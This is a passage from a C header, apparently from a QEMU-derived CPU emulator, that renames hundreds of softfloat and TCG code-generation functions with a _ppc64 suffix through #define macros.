float32_add_ppc64 #define float32_sub float32_sub_ppc64 #define float64_add float64_add_ppc64 #define float64_sub float64_sub_ppc64 #define float16_mul float16_mul_ppc64 #define float32_mul float32_mul_ppc64 #define float64_mul float64_mul_ppc64 #define float16_muladd float16_muladd_ppc64 #define float32_muladd float32_muladd_ppc64 #define float64_muladd float64_muladd_ppc64 #define float16_div float16_div_ppc64 #define float32_div float32_div_ppc64 #define float64_div float64_div_ppc64 #define float16_to_float32 float16_to_float32_ppc64 #define float16_to_float64 float16_to_float64_ppc64 #define float32_to_float16 float32_to_float16_ppc64 #define float32_to_float64 float32_to_float64_ppc64 #define float64_to_float16 float64_to_float16_ppc64 #define float64_to_float32 float64_to_float32_ppc64 #define float16_round_to_int float16_round_to_int_ppc64 #define float32_round_to_int float32_round_to_int_ppc64 #define float64_round_to_int float64_round_to_int_ppc64 #define float16_to_int16_scalbn float16_to_int16_scalbn_ppc64 #define float16_to_int32_scalbn float16_to_int32_scalbn_ppc64 #define float16_to_int64_scalbn float16_to_int64_scalbn_ppc64 #define float32_to_int16_scalbn float32_to_int16_scalbn_ppc64 #define float32_to_int32_scalbn float32_to_int32_scalbn_ppc64 #define float32_to_int64_scalbn float32_to_int64_scalbn_ppc64 #define float64_to_int16_scalbn float64_to_int16_scalbn_ppc64 #define float64_to_int32_scalbn float64_to_int32_scalbn_ppc64 #define float64_to_int64_scalbn float64_to_int64_scalbn_ppc64 #define float16_to_int16 float16_to_int16_ppc64 #define float16_to_int32 float16_to_int32_ppc64 #define float16_to_int64 float16_to_int64_ppc64 #define float32_to_int16 float32_to_int16_ppc64 #define float32_to_int32 float32_to_int32_ppc64 #define float32_to_int64 float32_to_int64_ppc64 #define float64_to_int16 float64_to_int16_ppc64 #define float64_to_int32 float64_to_int32_ppc64 #define float64_to_int64 float64_to_int64_ppc64 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_ppc64 #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_ppc64 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_ppc64 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_ppc64 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_ppc64 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_ppc64 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_ppc64 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_ppc64 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_ppc64 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_ppc64 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_ppc64 #define float16_to_uint64_scalbn float16_to_uint64_scalbn_ppc64 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_ppc64 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_ppc64 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_ppc64 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_ppc64 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_ppc64 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_ppc64 #define float16_to_uint16 float16_to_uint16_ppc64 #define float16_to_uint32 float16_to_uint32_ppc64 #define float16_to_uint64 float16_to_uint64_ppc64 #define float32_to_uint16 float32_to_uint16_ppc64 #define float32_to_uint32 float32_to_uint32_ppc64 #define float32_to_uint64 float32_to_uint64_ppc64 #define float64_to_uint16 float64_to_uint16_ppc64 #define float64_to_uint32 float64_to_uint32_ppc64 #define float64_to_uint64 float64_to_uint64_ppc64 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_ppc64 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_ppc64 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_ppc64 #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_ppc64 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_ppc64 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_ppc64 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_ppc64 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_ppc64 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_ppc64 #define int64_to_float16_scalbn int64_to_float16_scalbn_ppc64 #define int32_to_float16_scalbn int32_to_float16_scalbn_ppc64 #define int16_to_float16_scalbn int16_to_float16_scalbn_ppc64 #define int64_to_float16 int64_to_float16_ppc64 #define int32_to_float16 int32_to_float16_ppc64 #define int16_to_float16 int16_to_float16_ppc64 #define int64_to_float32_scalbn int64_to_float32_scalbn_ppc64 #define int32_to_float32_scalbn int32_to_float32_scalbn_ppc64 #define int16_to_float32_scalbn int16_to_float32_scalbn_ppc64 #define int64_to_float32 int64_to_float32_ppc64 #define int32_to_float32 int32_to_float32_ppc64 #define int16_to_float32 int16_to_float32_ppc64 #define int64_to_float64_scalbn int64_to_float64_scalbn_ppc64 #define int32_to_float64_scalbn int32_to_float64_scalbn_ppc64 #define int16_to_float64_scalbn int16_to_float64_scalbn_ppc64 #define int64_to_float64 int64_to_float64_ppc64 #define int32_to_float64 int32_to_float64_ppc64 #define int16_to_float64 int16_to_float64_ppc64 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_ppc64 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_ppc64 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_ppc64 #define uint64_to_float16 uint64_to_float16_ppc64 #define uint32_to_float16 uint32_to_float16_ppc64 #define uint16_to_float16 uint16_to_float16_ppc64 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_ppc64 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_ppc64 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_ppc64 #define uint64_to_float32 uint64_to_float32_ppc64 #define uint32_to_float32 uint32_to_float32_ppc64 #define uint16_to_float32 uint16_to_float32_ppc64 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_ppc64 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_ppc64 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_ppc64 #define uint64_to_float64 uint64_to_float64_ppc64 #define uint32_to_float64 uint32_to_float64_ppc64 #define uint16_to_float64 uint16_to_float64_ppc64 #define float16_min float16_min_ppc64 #define float16_minnum float16_minnum_ppc64 #define float16_minnummag float16_minnummag_ppc64 #define float16_max float16_max_ppc64 #define float16_maxnum float16_maxnum_ppc64 #define float16_maxnummag float16_maxnummag_ppc64 #define float32_min float32_min_ppc64 #define float32_minnum float32_minnum_ppc64 #define float32_minnummag float32_minnummag_ppc64 #define float32_max float32_max_ppc64 #define float32_maxnum float32_maxnum_ppc64 #define float32_maxnummag float32_maxnummag_ppc64 #define float64_min float64_min_ppc64 #define float64_minnum float64_minnum_ppc64 #define float64_minnummag float64_minnummag_ppc64 #define float64_max float64_max_ppc64 #define float64_maxnum float64_maxnum_ppc64 #define float64_maxnummag float64_maxnummag_ppc64 #define float16_compare float16_compare_ppc64 #define float16_compare_quiet float16_compare_quiet_ppc64 #define float32_compare float32_compare_ppc64 #define float32_compare_quiet float32_compare_quiet_ppc64 #define float64_compare float64_compare_ppc64 #define float64_compare_quiet float64_compare_quiet_ppc64 #define float16_scalbn float16_scalbn_ppc64 #define float32_scalbn float32_scalbn_ppc64 #define float64_scalbn float64_scalbn_ppc64 #define float16_sqrt float16_sqrt_ppc64 #define float32_sqrt float32_sqrt_ppc64 #define float64_sqrt float64_sqrt_ppc64 #define float16_default_nan float16_default_nan_ppc64 #define float32_default_nan float32_default_nan_ppc64 #define float64_default_nan float64_default_nan_ppc64 #define float128_default_nan float128_default_nan_ppc64 #define float16_silence_nan float16_silence_nan_ppc64 #define float32_silence_nan float32_silence_nan_ppc64 #define float64_silence_nan float64_silence_nan_ppc64 #define float16_squash_input_denormal float16_squash_input_denormal_ppc64 #define float32_squash_input_denormal float32_squash_input_denormal_ppc64 #define float64_squash_input_denormal float64_squash_input_denormal_ppc64 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_ppc64 #define roundAndPackFloatx80 roundAndPackFloatx80_ppc64 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_ppc64 #define int32_to_floatx80 int32_to_floatx80_ppc64 #define int32_to_float128 int32_to_float128_ppc64 #define int64_to_floatx80 int64_to_floatx80_ppc64 #define int64_to_float128 int64_to_float128_ppc64 #define uint64_to_float128 uint64_to_float128_ppc64 #define float32_to_floatx80 float32_to_floatx80_ppc64 #define float32_to_float128 float32_to_float128_ppc64 #define float32_rem float32_rem_ppc64 #define float32_exp2 float32_exp2_ppc64 #define float32_log2 float32_log2_ppc64 #define float32_eq float32_eq_ppc64 #define float32_le float32_le_ppc64 #define float32_lt float32_lt_ppc64 #define float32_unordered float32_unordered_ppc64 #define float32_eq_quiet float32_eq_quiet_ppc64 #define float32_le_quiet float32_le_quiet_ppc64 #define float32_lt_quiet float32_lt_quiet_ppc64 #define float32_unordered_quiet float32_unordered_quiet_ppc64 #define float64_to_floatx80 float64_to_floatx80_ppc64 #define float64_to_float128 float64_to_float128_ppc64 #define float64_rem float64_rem_ppc64 #define float64_log2 float64_log2_ppc64 #define float64_eq float64_eq_ppc64 #define float64_le float64_le_ppc64 #define float64_lt float64_lt_ppc64 #define float64_unordered float64_unordered_ppc64 #define float64_eq_quiet float64_eq_quiet_ppc64 #define float64_le_quiet float64_le_quiet_ppc64 #define float64_lt_quiet float64_lt_quiet_ppc64 #define float64_unordered_quiet float64_unordered_quiet_ppc64 #define floatx80_to_int32 floatx80_to_int32_ppc64 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_ppc64 #define floatx80_to_int64 floatx80_to_int64_ppc64 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_ppc64 #define floatx80_to_float32 floatx80_to_float32_ppc64 #define floatx80_to_float64 floatx80_to_float64_ppc64 #define floatx80_to_float128 floatx80_to_float128_ppc64 #define floatx80_round floatx80_round_ppc64 #define floatx80_round_to_int floatx80_round_to_int_ppc64 #define floatx80_add floatx80_add_ppc64 #define floatx80_sub floatx80_sub_ppc64 #define floatx80_mul floatx80_mul_ppc64 #define floatx80_div floatx80_div_ppc64 #define floatx80_rem floatx80_rem_ppc64 #define floatx80_sqrt floatx80_sqrt_ppc64 #define floatx80_eq floatx80_eq_ppc64 #define floatx80_le floatx80_le_ppc64 #define floatx80_lt floatx80_lt_ppc64 #define floatx80_unordered floatx80_unordered_ppc64 #define floatx80_eq_quiet floatx80_eq_quiet_ppc64 #define floatx80_le_quiet floatx80_le_quiet_ppc64 #define floatx80_lt_quiet floatx80_lt_quiet_ppc64 #define floatx80_unordered_quiet floatx80_unordered_quiet_ppc64 #define float128_to_int32 float128_to_int32_ppc64 #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_ppc64 #define float128_to_int64 float128_to_int64_ppc64 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_ppc64 #define float128_to_uint64 float128_to_uint64_ppc64 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_ppc64 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_ppc64 #define float128_to_uint32 float128_to_uint32_ppc64 #define float128_to_float32 float128_to_float32_ppc64 #define float128_to_float64 float128_to_float64_ppc64 #define float128_to_floatx80 float128_to_floatx80_ppc64 #define float128_round_to_int float128_round_to_int_ppc64 #define float128_add float128_add_ppc64 #define float128_sub float128_sub_ppc64 #define float128_mul float128_mul_ppc64 #define float128_div float128_div_ppc64 #define float128_rem float128_rem_ppc64 #define float128_sqrt float128_sqrt_ppc64 #define float128_eq float128_eq_ppc64 #define float128_le float128_le_ppc64 #define float128_lt float128_lt_ppc64 #define float128_unordered float128_unordered_ppc64 #define float128_eq_quiet float128_eq_quiet_ppc64 #define float128_le_quiet float128_le_quiet_ppc64 #define float128_lt_quiet float128_lt_quiet_ppc64 #define float128_unordered_quiet float128_unordered_quiet_ppc64 #define floatx80_compare floatx80_compare_ppc64 #define floatx80_compare_quiet floatx80_compare_quiet_ppc64 #define float128_compare float128_compare_ppc64 #define float128_compare_quiet float128_compare_quiet_ppc64 #define floatx80_scalbn floatx80_scalbn_ppc64 #define float128_scalbn float128_scalbn_ppc64 #define softfloat_init softfloat_init_ppc64 #define tcg_optimize tcg_optimize_ppc64 #define gen_new_label gen_new_label_ppc64 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_ppc64 #define tcg_expand_vec_op tcg_expand_vec_op_ppc64 #define tcg_register_jit tcg_register_jit_ppc64 #define tcg_tb_insert tcg_tb_insert_ppc64 #define tcg_tb_remove tcg_tb_remove_ppc64 #define tcg_tb_lookup tcg_tb_lookup_ppc64 #define tcg_tb_foreach tcg_tb_foreach_ppc64 #define tcg_nb_tbs tcg_nb_tbs_ppc64 #define tcg_region_reset_all tcg_region_reset_all_ppc64 #define tcg_region_init tcg_region_init_ppc64 #define tcg_code_size tcg_code_size_ppc64 #define tcg_code_capacity tcg_code_capacity_ppc64 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_ppc64 #define tcg_malloc_internal tcg_malloc_internal_ppc64 #define tcg_pool_reset tcg_pool_reset_ppc64 #define tcg_context_init tcg_context_init_ppc64 #define tcg_tb_alloc tcg_tb_alloc_ppc64 #define tcg_prologue_init tcg_prologue_init_ppc64 #define tcg_func_start tcg_func_start_ppc64 #define tcg_set_frame tcg_set_frame_ppc64 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_ppc64 #define tcg_temp_new_internal tcg_temp_new_internal_ppc64 #define tcg_temp_new_vec tcg_temp_new_vec_ppc64 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_ppc64 #define tcg_temp_free_internal tcg_temp_free_internal_ppc64 #define tcg_const_i32 tcg_const_i32_ppc64 #define tcg_const_i64 tcg_const_i64_ppc64 #define tcg_const_local_i32 tcg_const_local_i32_ppc64 #define tcg_const_local_i64 tcg_const_local_i64_ppc64 #define tcg_op_supported tcg_op_supported_ppc64 #define tcg_gen_callN tcg_gen_callN_ppc64 #define tcg_op_remove tcg_op_remove_ppc64 #define tcg_emit_op tcg_emit_op_ppc64 #define tcg_op_insert_before tcg_op_insert_before_ppc64 #define tcg_op_insert_after tcg_op_insert_after_ppc64 #define tcg_cpu_exec_time tcg_cpu_exec_time_ppc64 #define tcg_gen_code tcg_gen_code_ppc64 #define tcg_gen_op1 tcg_gen_op1_ppc64 #define tcg_gen_op2 tcg_gen_op2_ppc64 #define tcg_gen_op3 tcg_gen_op3_ppc64 #define tcg_gen_op4 tcg_gen_op4_ppc64 #define tcg_gen_op5 tcg_gen_op5_ppc64 #define tcg_gen_op6 tcg_gen_op6_ppc64 #define tcg_gen_mb tcg_gen_mb_ppc64 #define tcg_gen_addi_i32 tcg_gen_addi_i32_ppc64 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_ppc64 #define tcg_gen_subi_i32 tcg_gen_subi_i32_ppc64 #define tcg_gen_andi_i32 tcg_gen_andi_i32_ppc64 #define tcg_gen_ori_i32 tcg_gen_ori_i32_ppc64 #define tcg_gen_xori_i32 tcg_gen_xori_i32_ppc64 #define tcg_gen_shli_i32 tcg_gen_shli_i32_ppc64 #define tcg_gen_shri_i32 tcg_gen_shri_i32_ppc64 #define tcg_gen_sari_i32 tcg_gen_sari_i32_ppc64 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_ppc64 #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_ppc64 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_ppc64 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_ppc64 #define tcg_gen_muli_i32 tcg_gen_muli_i32_ppc64 #define tcg_gen_div_i32 tcg_gen_div_i32_ppc64 #define tcg_gen_rem_i32 tcg_gen_rem_i32_ppc64 #define tcg_gen_divu_i32 tcg_gen_divu_i32_ppc64 #define tcg_gen_remu_i32 tcg_gen_remu_i32_ppc64 #define tcg_gen_andc_i32 tcg_gen_andc_i32_ppc64 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_ppc64 #define tcg_gen_nand_i32 tcg_gen_nand_i32_ppc64 #define tcg_gen_nor_i32 tcg_gen_nor_i32_ppc64 #define tcg_gen_orc_i32 tcg_gen_orc_i32_ppc64 #define tcg_gen_clz_i32 tcg_gen_clz_i32_ppc64 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_ppc64 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_ppc64 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_ppc64 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_ppc64 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_ppc64 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_ppc64 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_ppc64 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_ppc64 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_ppc64 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_ppc64 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_ppc64 #define tcg_gen_extract_i32 tcg_gen_extract_i32_ppc64 #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_ppc64 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_ppc64 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_ppc64 #define tcg_gen_add2_i32 tcg_gen_add2_i32_ppc64 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_ppc64 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_ppc64 #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_ppc64 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_ppc64 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_ppc64 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_ppc64 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_ppc64 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_ppc64 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_ppc64 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_ppc64 #define tcg_gen_smin_i32 tcg_gen_smin_i32_ppc64 #define tcg_gen_umin_i32 tcg_gen_umin_i32_ppc64 #define tcg_gen_smax_i32 tcg_gen_smax_i32_ppc64 #define tcg_gen_umax_i32 tcg_gen_umax_i32_ppc64 #define tcg_gen_abs_i32 tcg_gen_abs_i32_ppc64 #define tcg_gen_addi_i64 tcg_gen_addi_i64_ppc64 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_ppc64 #define tcg_gen_subi_i64 tcg_gen_subi_i64_ppc64 #define tcg_gen_andi_i64 tcg_gen_andi_i64_ppc64 #define tcg_gen_ori_i64 tcg_gen_ori_i64_ppc64 #define tcg_gen_xori_i64 tcg_gen_xori_i64_ppc64 #define tcg_gen_shli_i64 tcg_gen_shli_i64_ppc64 #define tcg_gen_shri_i64 tcg_gen_shri_i64_ppc64 #define tcg_gen_sari_i64 tcg_gen_sari_i64_ppc64 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_ppc64 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_ppc64 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_ppc64 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_ppc64 #define tcg_gen_muli_i64 tcg_gen_muli_i64_ppc64 #define tcg_gen_div_i64 tcg_gen_div_i64_ppc64 #define tcg_gen_rem_i64 tcg_gen_rem_i64_ppc64 #define tcg_gen_divu_i64 tcg_gen_divu_i64_ppc64 #define tcg_gen_remu_i64 tcg_gen_remu_i64_ppc64 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_ppc64 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_ppc64 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_ppc64 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_ppc64 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_ppc64 #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_ppc64 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_ppc64 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_ppc64 #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_ppc64 #define tcg_gen_not_i64 tcg_gen_not_i64_ppc64 #define tcg_gen_andc_i64 tcg_gen_andc_i64_ppc64 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_ppc64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_ppc64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_ppc64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_ppc64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_ppc64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_ppc64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_ppc64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_ppc64 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_ppc64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_ppc64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_ppc64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_ppc64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_ppc64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_ppc64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_ppc64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_ppc64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_ppc64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_ppc64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_ppc64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_ppc64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_ppc64 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_ppc64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_ppc64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_ppc64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_ppc64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_ppc64 #define tcg_gen_umin_i64 tcg_gen_umin_i64_ppc64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_ppc64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_ppc64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_ppc64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_ppc64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_ppc64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_ppc64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_ppc64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_ppc64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_ppc64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_ppc64 #define tcg_gen_exit_tb tcg_gen_exit_tb_ppc64 #define tcg_gen_goto_tb tcg_gen_goto_tb_ppc64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_ppc64 #define check_exit_request check_exit_request_ppc64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_ppc64 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_ppc64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_ppc64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_ppc64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_ppc64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_ppc64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_ppc64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_ppc64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_ppc64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_ppc64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_ppc64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_ppc64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_ppc64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_ppc64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_ppc64 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_ppc64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_ppc64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_ppc64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_ppc64 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_ppc64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_ppc64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_ppc64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_ppc64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_ppc64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_ppc64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_ppc64 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_ppc64 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_ppc64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_ppc64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_ppc64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_ppc64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_ppc64 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_ppc64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_ppc64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_ppc64 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_ppc64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_ppc64 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_ppc64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_ppc64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_ppc64 #define simd_desc simd_desc_ppc64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_ppc64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_ppc64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_ppc64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_ppc64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_ppc64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_ppc64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_ppc64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_ppc64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_ppc64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_ppc64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_ppc64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_ppc64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_ppc64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_ppc64 #define tcg_gen_gvec_4 tcg_gen_gvec_4_ppc64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_ppc64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_ppc64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_ppc64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_ppc64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_ppc64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_ppc64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_ppc64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_ppc64 #define tcg_gen_gvec_not tcg_gen_gvec_not_ppc64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_ppc64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_ppc64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_ppc64 #define tcg_gen_gvec_add tcg_gen_gvec_add_ppc64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_ppc64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_ppc64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_ppc64 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_ppc64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_ppc64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_ppc64 #define tcg_gen_gvec_sub 